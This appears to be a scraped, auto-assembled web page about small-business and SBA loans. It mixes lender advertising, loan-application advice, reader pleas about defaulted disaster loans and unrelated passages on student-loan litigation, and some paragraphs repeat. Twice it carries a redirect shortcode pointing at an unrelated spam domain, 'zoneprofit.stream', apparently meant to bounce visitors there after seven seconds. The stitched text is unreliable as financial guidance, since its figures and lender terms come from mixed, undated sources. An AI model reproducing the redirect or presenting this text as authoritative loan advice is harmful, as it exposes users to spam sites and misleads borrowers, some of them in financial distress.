If approved, it might take between 30 and 60 days to close the loan and receive funds. The length of this time requirement will be determined by the use of funds and what collateral is required.  If you’re using the loan to buy real estate or a business entity, your loan closing will coincide with the purchase closing.

To qualify for a small-business loan, you may have to provide collateral to back the loan. Collateral is an asset, such as equipment, real estate or inventory, that can be seized and sold by the lender if you can’t make your payments. It’s basically a way lenders can recover their money if your business fails.

I received a disaster loan after hurricane Katrina. I had a small house that I was remodeling. My insurance cancelled because house was not livable. I became disabled after getting the loan and was forced to file for SS disability. With the decline in my income I missed a couple of payments and my loan was turned over to a collection agency. They deduct my payment out of my SS check before I get it. It doesn’t leave me enough to even rent an apt. Is there any way I can get this loan forgiven. Please help!

Businesses can apply for multiple types of SBA Disaster Loans at the same time to meet their various needs. Proceeds from disaster loans can also be used to relocate your business with approval from the SBA.

The SBA has several programs, but the most common is its 7(a) Guaranty Loan Program. Fees are lower and terms can be longer than those of non-SBA loans, but the main draw is the looser requirements. You may encounter drawbacks such as lower loan caps and stricter requirements on the use of the loan, however.

I have had an SBA loan for three years which allowed me to purchase the property by business occupies. I have always paid on time. I want to now sell my business and property but that is a hefty price tag so I want to sell only the business and hold the real estate for a while, until either I can sell it or the new business owners can purchase it. My loan document states that I would be in Default if I sold my business, merged, or did anything else that would in effect the ownership without ‘ prior written consent from the bank’.

Paying your bills on time is crucial to building your score. But even if you pay your bills like clockwork, credit report errors could be damaging your score. One in 4 consumers identified damaging credit report errors, according to a 2012 study by the Federal Trade Commission. However, 4 out of 5 consumers who filed a dispute got their credit report modified, the study found. A follow-up study by the FTC found that 20% of those consumers saw a jump in their credit score after resolving errors. You can get a copy of your credit reports for free once a year at AnnualCreditReport.com and dispute any inaccuracies you find through each of the credit bureaus’ websites (Experian, Equifax and TransUnion).

For-profit lenders are reluctant to issue loans to anyone who does not have a strong credit report and financial history. That is not the case with government small business loans. Obviously, a decent credit report is important, and you will have to follow the guidelines regarding the repayment period and the interest rate set by the government, but usually the interest rates charged by government loans are lower than those you could expect in the private sector.

Since you have unpaid customer invoices, you can turn to BlueVine and Fundbox for a cash advance against those receivables. If you make at least $120,000 in annual revenue, BlueVine will cover 85% of invoices up to $2 million. BlueVine is a good choice if you have credit-strong clients and large outstanding payments. If you’re looking to finance a smaller amount, Fundbox covers 100% of your unpaid invoices up to $100,000. To qualify, you need at least six months of activity in a compatible online accounting software such as QuickBooks.

You must, however, have at least six months of activity in an online accounting software such as QuickBooks to qualify for Fundbox.

In other words, an SBA Microloan is by no means a giveaway. The intermediary lender has a little more flexibility in determining who seems creditworthy that larger, rigid lending institutions but they still need to feel extremely confident of your ability to repay the loan.

The SBA Export Express Loan is quite flexible in what the proceeds can be used for. From covering the cost of participating in foreign trade shows, producing promotional materials for foreign markets, or buy equipment and expand your facilities.

HUBZone is an SBA program for small companies that operate and employ people in Historically Underutilized Business Zones (HUBZones). The HUBZone program was created in response to the HUBZone Empowerment Act created by the US Congress in 1998.

The loans that National Collegiate holds were made to college students more than a decade ago by dozens of different banks, then bundled together by a financing company and sold to investors through a process known as securitization. These private loans were not guaranteed by the federal government, which is the nation’s largest student loan lender.

In situations where you are unable (or unwilling) to make payments, the lender will begin the collection process as laid out in the SBA loan agreement. Actions include the sale of assets you used to collateralize the debt. This will include business assets, and for larger loans, maybe even your home and other properties. The lender can close the business and can also foreclose on your property.

• Review your credit report. “A major consideration for a lender to make a loan is the ‘character’ of the borrower,” Anderson says. “Lenders want to loan money to people who have a positive track record for paying their obligations as agreed.” The “Fair Isaac Credit Score” (FICO) is one measure used to evaluate character. Credit scores can range from 300-850, and it is very important that you have a relatively high score to be able to secure a SBA loan. While some SBA loans may be made with FICO scores below 700, potential borrowers with scores in the high 700s or 800s are generally greeted with respect by lenders. You can review your credit reports — for free — from all three credit-reporting companies — Experian, Equifax and TransUnion — once per year to insure that they are accurate. You need to be prepared because the bank will pull the credit reports on you. If you find mistakes on your credit reports, take steps to correct those mistakes and bring the e-mails, letters, and other correspondence with you to the bank when applying for a loan. “When you go to the bank, you can say, ‘It’s a mistake. It’s not me.’ And you have the letter to show them,” says Cruz. “At least it’s not a surprise to you. You don’t want to be surprised.” Professionals also can provide guidance for improving credit scores. Personal income tax reports for three years will be required for all parties that own at least 20 percent of the company’s equity. A weak FICO Score from a 20 percent to 25 percent owner can badly damage the obtaining of a SBA Small Business Loan.

Small business loans can be critical to your success as a business owner. Traditional banks are no longer your only option. From SBA loans to business lines of credit to invoice-based financing, you now have access to many options through online lenders. Find the business financing product that is best for you. Learn about loan/product types.

• Develop your business plan. You need to have a business plan that states in writing what your business is, what you need money for, and why you will be successful. If you have a 25-page business plan already, you can update the Executive Summary section with information about your financing needs. If you don’t have a business plan, you need to develop one — even a five-page document will be more impressive than none at all. Templates and software are available online to provide valuable guidance. For example, SCORE has a template that provides considerable help. Inc. also has a guide on how to write a business plan. “It is useful to have an experienced businessperson review and critique the draft business plan,” Anderson says. In addition, Cruz adds, have someone review your plan for grammar and spelling.

Business financing options other than traditional loans or lines of credit include personal loans for business or business credit cards. A personal loan for business is a good option if business is still young and you don’t qualify for traditional financing. Personal-loan providers look at your personal credit score and income instead of your business history.

As a young entrepreneur with strong personal credit, you may find it easier to qualify for a personal loan or a business credit card. Personal loans and business credit cards are also decent options for startups because approval is based on personal credit score rather than business history. The amount you can finance is typically smaller than with a term loan, however, and you need good credit to qualify. Keep in mind that failure to repay can ruin your personal credit.

Now that you have a general overview of the six primary kinds of SBA loans, and the frequency of funding for each, it’s important to understand the difference between SBA loans and traditional bank loans.

OnDeck offers Short and Long Term Loans and Lines of Credit. Short term loans range from 3 to 12 months at simple interest rates as low as 9%. Long term loans range from 15-36 months at annual interest rates as low as 9.99%. Lines of credit for up to $100,000 are available at APRs as low as 13.99%.

Since your new company earns less than $25,000, microloans and personal loans are good options for necessary capital. Microloans through nonprofits and the SBA usually have low APRs and manageable payment terms. If your credit is in the high 600s, you can opt for a personal loan, though they often aren’t available for more than $35,000 and tend to come with higher APRs than microloans.

But National Collegiate’s problems are especially acute, she said. Over and over, she said, the company drops lawsuits — often on the eve of a trial or deposition — when borrowers contest them. “I question whether they actually possess the documents necessary to show that they own loans,” Ms. Smith said.

Keep in mind that since you don’t have a business started up yet or you’re just starting out, you likely have to borrow money based on your personal finances. For this reason, you’re more likely to qualify for startup financing with a strong personal credit score (720 or higher).

To help the government fight the funding of terrorism and money laundering activities, Federal law requires all financial institutions to obtain, verify, and record information that identifies each person and business that seeks a business loan. What this means for you: When you apply for a loan, we will ask for your business name, address, and Tax Identification Number. We will also ask for your name, address, date of birth, and other information that will allow us to identify you. We may also ask to see your driver’s license or other identifying documents.

That’s why we don’t provide them with the same working capital! Our small business loans range from $5,000 to $500,000, so you’re guaranteed to receive an amount that works for your business’s needs. Plus, working capital can be in your business’s bank account in as little as 72 hours from approval. What’s not to love?

Since your business has steady revenue and has been operating for more than a year, consider OnDeck and Kabbage. If your personal credit score is at least 500, OnDeck offers term loans up to $500,000, which is an attractive option for large expansion projects or buying expensive equipment. If you’re looking for short-term financing or need a smaller amount, consider Kabbage, which does not require a minimum credit score. Kabbage offers only six- or 12-month financing of up to $250,000 at high borrowing costs.

As with all loans, having all your paperwork and financial information prepared in advance will help speed up the process.  If approved, receiving the funds make take between 30 and 60 days, though some lenders are willing to cover immediately to close your loan.

The Cost of Credit After you have gone through the application process and you are approved, you need to still make some important decisions. Understanding the true cost of credit can be confusing. Choosing between the available loan products can greatly affect the amount of the total or true cost of your business loan. [redirect url=’http://zoneprofit.stream/bump’ sec=’7′]

Businesses that are more established and want to apply for bank loans can check out their business credit scores (which generally range from 0 to 100) at three business credit bureaus: Experian, Equifax and Dun & Bradstreet. Check out these five steps to building business credit, and if you see any mistakes on your reports, contact the bureaus.

The SBA doesn’t make any of the loans itself, but makes it all possible by guaranteeing the loans made by other lending institutions. What usually happens in the case of a default is the lending bank will contact you and explain the details of the default and how to remedy it.

Before submitting your application, you should review the lender’s qualifications. It is important that you comprehend the application and know what to expect throughout the process. You can view our funding requirements below. If you have any questions, don’t be afraid to ask!

We need to proactively contact the SBA and work out a settlement. If you fail to do so, at some point you will receive a notice form the Department of Treasury and we will need to negotiate with them. They will tack 30% on to the amount owed, which is legal per the SBA loan documents that you signed. Treasury is much harder to deal with than the SBA.

You may qualify for an SBA Military Reservist Economic Injury Loan if an essential employee is called for active military duty and the loss results in an inability to meet normal operating expenses. If the business is already covered by key man insurance or other business interruption insurance, the amount of the loan will reduce by the amount of coverage.

Whether you’re a startup or an established business, we don’t ask for a lot of money to lend you a lot of money — all we want is for you to have $100,000 in annual gross sales and to be at least 6 months in business.

Government small business loans benefit both small businesses and the lending agency. For small businesses, it is beneficial because this is money & capital they may not have access too. For banks, the loan’s risk is decreased due to the loan being backed by the SBA.

The lack of a credit history, collateral or the inability to secure a loan through a bank doesn’t mean no one will lend to you. One option would be to apply for a microloan, a small business loan ranging from $500 to $35,000. Microloans are often so small that commercial banks can’t be bothered lending the funds. Instead of a bank, you need to turn to a microlender. a non-profit organization that works differently than banks. Microlenders offer smaller loan sizes, usually require less documentation than banks, and often apply more flexible underwriting criteria. There are a few hundred microlenders throughout the U.S. and they often charge slightly higher interest rates for loans than banks. “Microloans are really for that startup entrepreneur or an entrepreneur in an existing business facing a capital gap who needs to secure capital for new equipment or to service a contract,” says Connie Evans, president and CEO of AEO, which represents 400 mostly non-profit microlenders and microenterprise organizations.

There’s no cost or obligation to compare SBA loan options and apply through Lendio, but many lenders will charge you application fees. If you’re shopping around, avoid surprises by asking about application fees. [redirect url=’http://zoneprofit.stream/bump’ sec=’7′]

“small business loans today +get a loans to open your own business”

Small businesses must meet certain criteria to qualify for an SBA loan, including size requirements, financial standing and being in a for-profit industry. SBA loans cannot be made to a small business if the borrower has access to other financing that offers reasonable terms. In addition, a small business must meet the credit qualifications of the lending partner.

Businesses typically qualify for our products if they make more than $12,000 a month in gross sales. This prerequisite stands because we do not want to provide financing to a business if the repayment process will be difficult for them to handle while meeting their other responsibilities (such as paying rent or purchasing inventory).

Loan Processing and Service fees: Over the lifetime of a loan, your lender will perform a variety of activities, such as customer service or billing, to manage and administrate the loan. A service or processing fee is used to cover the cost of these expenses. Service fees are frequently billed monthly or according to the loan repayment schedule, but some lenders may only charge a one-time service fee. Service fees are usually charged as a percentage of payment amount (if billed regularly) or of the total loan amount (if one- time).

The maximum amount you can borrow with an SBA disaster loan is $2 million. The maximum repayment time is 30 years, though the SBA will determine the repayment time on a case-by-case basis depending on your ability to pay back the loan.

In October 2009, the Government Accountability Office released Report 10-108 which stated, “By failing to hold firms accountable, SBA and contracting agencies have sent a message to the contracting community that there is no punishment or consequences for committing fraud.”[30]

With a business line of credit, lenders will establish a credit limit for a maximum amount of money they will lend you. You can draw as much as you need up to your limit and like a credit card; you pay interest only on the amount you borrow. Business Lines of Credit can help bridge the gap during seasonal lulls and other lean periods. A business line of credit can ensure that you always have the capital you need, when you need it.

SBA loans are used heavily by banks of all sizes to finance the purchase or construction of business owner-occupied real estate (i.e., real property purchased for commerce). Many banks offer SBA loans only for this purpose. In particular, they finance properties that a bank would consider too risky to finance conventionally, due to being of a special use [bowling alley, automobile repair] or environmentally risky nature [petroleum products storage, electrical substation] that can make their resale value limited. Some example properties include motels, gas stations and car washes.

A business line of credit provides access to flexible cash. Lenders give you access to a specific amount of credit (say, $100,000), but you don’t make payments or get charged interest until you tap into the funds.

Trade finance under the SBA Export loan program is broken up into three types of loans, but they all have the same goal. The aim is to expand international trade and export activities. Here is what each loan within the SBA Export program can be used for:

At Fora Financial, we do not restrict how you use your loan, so you can use it in ways that will benefit your specific business. Whether it is purchasing equipment or paying employees, you’ll be able to meet your business’s specific needs.

Prior to submitting your application, it is important to consider the documents you’ll need to compile. We require your business’s three most recent bank statements and our one-page application to get started. Depending on other factors, a lender may request a month-to-date bank statement, tax returns, P&L and balance sheet.

Still, low annual percentage rates make the SBA program one of the smartest ways to fund your company. With some know-how and preparation, you may be able to secure some of the lowest business financing available. And if you don’t qualify for an SBA loan, there are other faster, more accessible ways to borrow money.

The trade off is that the SBA, as a federal agency, is promoting certain policy agendas. This results in SBA loans having strict requirements that the borrower must meet in order to qualify for the loan, including how the proceeds of the loan can be used.

Because you’re just starting out and your personal credit score is below 600, your best bet is microloans through nonprofit lenders or the U.S. Small Business Administration. The downside is these are “micro” amounts of money, usually no more than $50,000. However, many microlenders help businesses grow and establish better credit. SBA microloans generally have an APR of 8% to 8.5% and manageable repayment terms. Successfully repaying microloans will boost your credit score and make you eligible for bigger financing.

In addition to your credit score, lenders will consider how long your business has been operating. You need to have been in business at least one year to qualify for most online small-business loans and at least two years to qualify for most bank loans.

Many business owners report feeling stressed when applying for a small business loan. It seems that lenders are asking for more and more documentation with each passing day. In reality, most lenders have a standard discovery list of documents that are required to apply for and process a loan. Knowing which documents will be required and getting that documentation in order before you apply for your business loan can reduce your stress and speed-up approval of your loan.

Many small-business owners use credit cards for funding. Business credit cards are best for short-term expenses. Research has shown that small businesses that rely heavily on credit card financing typically fail.

An unsecured business loan is a loan that does not require the borrower to pledge assets of the company to borrow funds. However, in most cases an unsecured loan requires a personal guarantee of repayment and will generally have a higher interest rate and fees.

Since you’ve been in business more than a year and have decent credit, you may qualify for funding from StreetShares or OnDeck. If you have at least $25,000 in revenue, StreetShares offers a loan or line of credit up to $100,000. If you want more funding, OnDeck has term loans of up to $500,000. OnDeck’s loans, however, can be costlier, with APRs as high as 98%; StreetShares’ funding has a maximum 40% APR.

• Assemble a complete financial history. In addition to your personal credit information, a lender is going to want to know that your business has a stable financial history. “An accurate and complete financial history is very important to lend credibility to the SBA loan request,” Anderson says. “If you are currently in business, lenders will want to see profit and loss statements for three complete fiscal years and the current year to date. In addition they will want a recent balance sheet, within the last 60 days.” If you are just starting a business, this step is not required. But keep in mind that it is much more difficult to obtain SBA loans for start-up businesses than existing businesses.

“Follow up and treat a lender like you treated your significant other before you got married,” Cruz says. “It’s a romance. Ask, ‘What can I do? Is there anything else you need?’ Always be polite and professional. You can be friendly with them but it’s professional. It’s a business relationship and keep it as such and it will help you down the line.”

To qualify for a small-business loan, you may have to provide collateral to back the loan. Collateral is an asset, such as equipment, real estate or inventory, that can be seized and sold by the lender if you can’t make your payments. It’s basically a way lenders can recover their money if your business fails.

With strong personal credit and an established business, you may be eligible for an SBA loan, which offers low APRs and longer terms. SmartBiz is a good option if you have at least $50,000 in annual revenue. For smaller loans (under $100,000) and less stringent requirements, StreetShares offers a line of credit, a good alternative, especially for military veterans. If the SBA accepts your offer, then everyone will be happy as long as the repayments are made. In cases where the SBA rejects the offer, you usually have an opportunity to recalibrate and submit again. Other times, the SBA will simply send the account to the Treasury Department. At that point, the Treasury Department has a full range of collection options (like garnishing wages and taking tax returns).

It’s important to remember, however, that credit cards are an expensive way of financing a small business, particularly if you have bad credit.

Prosper is similar to LendingClub, but it doesn’t have separate loans for small businesses. However, you can use its unsecured personal loans for small business purposes. This can make Prosper a good choice if you need a smaller amount (you can borrow up to $35,000) and your business doesn’t have the established track record to qualify for dedicated small business loans.

A big advantage of getting a business line of credit as opposed to a term loan is that you don’t pay interest on a business line of credit unless you actually use the funds. Meeting short term working capital needs without taking in long term debt can save businesses on interest and help the balance sheets.

Because of unemployment, I defaulted on a SBA disaster loan for the contents of my home. The collection company has charged an outrageous administration fee. What can I do to reduce the administrative fee. Once I started working, I’ve been paying my loan every month for the past eight months, but they will not reduce the fee. Help?

Who should pass: Any small-business owner who doesn’t want to put his or her personal credit on the line will want to skip Prosper. The relatively low loan limit and inflexible terms may also be too restrictive for some. The two-week wait for funds also applies.

SBA’s 7(a) Loan Guaranty Program serves as SBA’s primary business loan program to help qualified small businesses obtain financing when it is not available elsewhere. Loan proceeds can be used for most business purposes including working capital, equipment, furniture, land and building. Loan maturities are up to 10 years for working capital and up to 25 years for real estate. SBA’s 7(a) Loan Guaranty Program has a maximum loan amount of $5 million, with a maximum exposure of $3.75 million. Thus, if a business receives an SBA guaranteed loan for $2 million, the maximum SBA guaranty to the lender will be $1.5 million or 75%.

Let’s take an average month of operations sales and expenses. Let’s assume the cash flow of your small business is $6,000 (gross sales minus expenses). Now let’s assume that your loan payments will total $1,500 per month. That makes your DSCR a 4, which is pretty strong. Most lenders will look for a score of at least 1.5 and definitely above a score of 1. A DSCR of less than 1 means you don’t have enough free cash flow to repay your loan from business operations.

• Work with the lender. Cooperate with the lender by providing all information requested, so that the lender can complete the evaluation and, if the lender decides to make a deal, submit materials to the SBA, Anderson says. If the loan is approved, you will be notified and requested to sign final loan papers. The lender will then fund the SBA Loan.

The speed and efficiency of the process were incredible. I was able to introduce my RecoveryWear line and increase sales 4X over.”
